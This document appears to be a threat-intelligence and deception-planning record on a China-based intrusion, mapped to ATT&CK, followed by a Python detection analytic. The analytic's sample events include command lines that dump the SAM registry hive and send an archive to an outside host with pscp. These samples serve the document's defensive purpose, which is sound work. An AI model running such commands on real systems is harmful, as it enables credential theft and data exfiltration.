Subject: China attacks U.S. Companies
Tactics: TA0006 Credential Access, TA0007 Discovery, TA0010 Exfiltration, TA0001 Initial Access, TA0008 Lateral Movement
Technique: T1087 Account Discovery, T1041 Exfiltration Over C2 Channel, T1133 External Remote Services, T1003 OS Credential Dumping, T1021 Remote Services, T1558 Steal or Forge Kerberos Tickets, T1082 System Information Discovery
Procedure:
The attackers leveraged WMI (Windows Management Instrumentation), Microsoft's built-in command-line management tool, to execute commands on a remote computer, which indicates that external remote services were likely exploited to gain initial access to the network.
Vulnerability: EAV0010 When adversaries interact with network or system resources, they are vulnerable to triggering tripwires or engaging in easily detectable, anomalous behavior; EAV0017 When adversaries discover enabled, accessible, or intentionally weakened/overly permissive resources in the environment (production or isolated), they are vulnerable to revealing additional or more advanced capabilities when exploiting or using said resource.
Engagement Opportunity:
Deploy a honeypot mimicking a vulnerable remote service (such as WMI) to lure attackers. Monitor the honeypot for interactions resembling the attack patterns observed in the report. This setup can help in understanding attacker TTPs, gathering intelligence on their tools, and potentially identifying the threat actors.
Threat Actor: China-based threat actor
Threat Objective:
Gain unauthorized access to the network and execute malicious commands for further exploitation.
Deception Opportunity:
Set up a decoy network segment with intentionally vulnerable remote services. Lead the attackers towards this segment through breadcrumbs or by making it appear as a high-value target. This can divert their attention from the actual network and provide an opportunity to study their tools and techniques in a controlled environment.
Sensor Data Placement: User-Mode
Observable Level: Core to Pre-Existing Tool
Scoring Rationale:
The analytic focuses on the usage of WMI, a legitimate tool present on Windows systems. Leveraging such tools is a common attacker tactic, making the observable core to the attacker’s technique. The data required for this analytic would likely reside in user-mode process logs or command execution monitoring tools.
Link to Report:
Link to Report II:
Additional Comments:
The initial attack vector remains unknown; the attackers may have used an unknown exploit or social engineering tactic to gain initial access. Further investigation is needed to determine the exact entry point.
Possible elements:
MSG (Pseudocode):
# Malicious Sub-Graph Standard
# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])
# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])
# China-based Threat Actor Attack Chain
[1]: Initial Access [TA0001] - External Remote Services [T1133] - Leverage WMI to execute commands on a remote computer (Core to Pre-Existing Tool) [cite: 18]
[2]: Discovery [TA0007] - System Information Discovery [T1082] - Use "wevtutil" to query Windows Event Logs (Core to Pre-Existing Tool) [cite: 44]
[3]: Discovery [TA0007] - Account Discovery [T1087] - Use PowerShell to enumerate Active Directory information (Core to Pre-Existing Tool) [cite: 46, 47, 53]
[4]: Lateral Movement [TA0008] - Remote Services [T1021] - Use "PsExec" and WMI for remote command execution (Core to Pre-Existing Tool) [cite: 18, 34, 40, 50, 54]
[5]: Credential Access [TA0006] - OS Credential Dumping [T1003] - Use "reg.exe" to dump credentials from the registry (Core to Pre-Existing Tool) [cite: 19]
[6]: Credential Access [TA0006] - Kerberoasting [T1558] - Execute encoded PowerShell script to extract Kerberos security tokens for service accounts (Core to Some Implementations of (Sub-)Technique) [cite: 22, 23, 24, 25]
[7]: Exfiltration [TA0010] - Exfiltration Over C2 Channel [T1041] - Deploy "FileZilla" and "PSCP" for data exfiltration (Core to Adversary-Brought Tool) [cite: 35, 38, 39]
1 --> 2 (Lack of System Monitoring)
2 --> 3 (Lack of Active Directory Security)
3 --> 4 (Lack of Network Segmentation)
4 --> 5 (Lack of Account Security)
5 --> 6 (Weak Password Policy)
6 --> 7 (Lack of Data Loss Prevention)
# Pseudocode Standard
# Function Format:
# function [Tactic]_[Technique]([Input]):
#     [Procedure]
#     return [Output]
function Initial_Access_External_Remote_Services(target_computer):
    # Utilize WMI to connect to the target computer
    # Execute malicious commands on the target
    return remote_code_execution
function Discovery_System_Information_Discovery():
    # Execute "wevtutil" command to query Windows Event Logs
    return system_information
function Discovery_Account_Discovery():
    # Execute PowerShell scripts to enumerate Active Directory information
    return account_information
function Lateral_Movement_Remote_Services(target_computer):
    # Utilize PsExec and WMI to connect to the target computer
    # Execute malicious commands on the target
    return lateral_movement
function Credential_Access_OS_Credential_Dumping():
    # Execute "reg.exe" to dump credentials from the registry
    return credentials
function Credential_Access_Kerberoasting():
    # Execute encoded PowerShell script to extract Kerberos security tokens
    return kerberos_tickets
function Exfiltration_Exfiltration_Over_C2_Channel(exfiltrated_data):
    # Utilize FileZilla and PSCP to exfiltrate data
    return exfiltration_success
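The Scoring Rationale notes that the data for this analytic lives in user-mode process and command-execution telemetry. The following is an added detection example, not part of the report or the MSG above: it turns each node of the attack chain (1 through 7) into a rule over host events, adds the EAV0010 tripwire from the Engagement Opportunity as a honeytoken service-account check, and reports how far along the chain each host has progressed. The event field names (host, event_id, parent, image, cmdline, service_name), the sample events, and the honeytoken account name svc_backup_honey are all constructed assumptions modelled loosely on Sysmon EID 1 / Security 4688 / 4769 fields, not an exact schema.

```python
"""Detection analytic for the MSG attack chain (added example, not from the report).

Field names and sample events are ASSUMED / constructed; adapt the accessors to
the real schema of your process-creation and Kerberos (4769) telemetry.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (not from the report); one dict per host event.
SAMPLE_EVENTS = [
    {"host": "ws01", "event_id": 1, "parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},                                  # node 1/4
    {"host": "ws01", "event_id": 1, "parent": "cmd.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil qe Security /c:20 /f:text"},                 # node 2
    {"host": "ws01", "event_id": 1, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-ADComputer -Filter *"},   # node 3
    {"host": "ws01", "event_id": 1, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc SQBFAFgA"},        # node 6
    {"host": "dc01", "event_id": 1, "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "PSEXESVC.exe"},                                       # node 4
    {"host": "dc01", "event_id": 1, "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg.exe save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv"},  # node 5
    {"host": "dc01", "event_id": 4769, "service_name": "svc_backup_honey",
     "ticket_encryption": "0x17", "account": "jdoe"},                  # tripwire
    {"host": "ws01", "event_id": 1, "parent": "explorer.exe", "image": "pscp.exe",
     "cmdline": "pscp.exe C:\\Users\\Public\\out.zip user@203.0.113.10:/tmp/"},  # node 7
    {"host": "ws02", "event_id": 1, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe"},                                        # benign
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PWSH = {"powershell.exe", "pwsh.exe"}
# Constructed honeytoken service account (assumption): a decoy SPN that no
# legitimate workflow requests, so any TGS request for it is a tripwire (EAV0010).
HONEY_SPNS = {"svc_backup_honey"}


def _img(e):
    return e.get("image", "").lower()


def _cmd(e):
    return e.get("cmdline", "").lower()


# (MSG node id(s), description, predicate). Node ids refer to the chain above.
RULES = [
    ("1/4", "T1133/T1021 shell spawned by WMI provider host",
     lambda e: e.get("event_id") == 1
     and e.get("parent", "").lower() == "wmiprvse.exe" and _img(e) in SHELLS),
    ("2", "T1082 wevtutil event-log query",
     lambda e: _img(e) == "wevtutil.exe" and " qe " in _cmd(e)),
    ("3", "T1087 PowerShell Active Directory enumeration",
     lambda e: _img(e) in PWSH
     and re.search(r"get-ad(user|computer|group)|adsisearcher", _cmd(e))),
    ("4", "T1021 PsExec service binary started",
     lambda e: _img(e) == "psexesvc.exe"),
    ("5", "T1003 registry hive saved via reg.exe",
     lambda e: _img(e) == "reg.exe" and "save" in _cmd(e)
     and re.search(r"hklm\\(sam|security|system)", _cmd(e))),
    ("6", "T1558 encoded PowerShell command",
     lambda e: _img(e) in PWSH
     and re.search(r"\s-e(nc|ncodedcommand)?\s", _cmd(e))),
    ("6", "T1558 TGS requested for honeytoken SPN (EAV0010 tripwire)",
     lambda e: e.get("event_id") == 4769
     and e.get("service_name", "").lower() in HONEY_SPNS),
    ("7", "T1041 known exfiltration client launched",
     lambda e: _img(e) in {"pscp.exe", "filezilla.exe"}),
]


def evaluate(events):
    """Return one finding dict per (event, matching rule) pair."""
    findings = []
    for e in events:
        for node, desc, pred in RULES:
            if pred(e):
                findings.append({"host": e["host"], "node": node, "desc": desc})
    return findings


def chain_coverage(findings):
    """Map each host to the set of chain nodes observed on it, so an analyst can
    see how far along the graph (1 -> 7) the activity has progressed."""
    cov = defaultdict(set)
    for f in findings:
        for n in f["node"].split("/"):
            cov[f["host"]].add(int(n))
    return dict(cov)


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']}: node {h['node']} - {h['desc']}")
    print("chain coverage per host:", chain_coverage(hits))
```

Each rule is deliberately narrow and keyed to the "Core to Pre-Existing Tool" observables listed in the MSG; a host that accumulates nodes across the chain (here ws01 shows 1, 2, 3, 4, 6 and 7) is a far stronger signal than any single rule firing, and the honeytoken SPN rule never fires on legitimate traffic by construction.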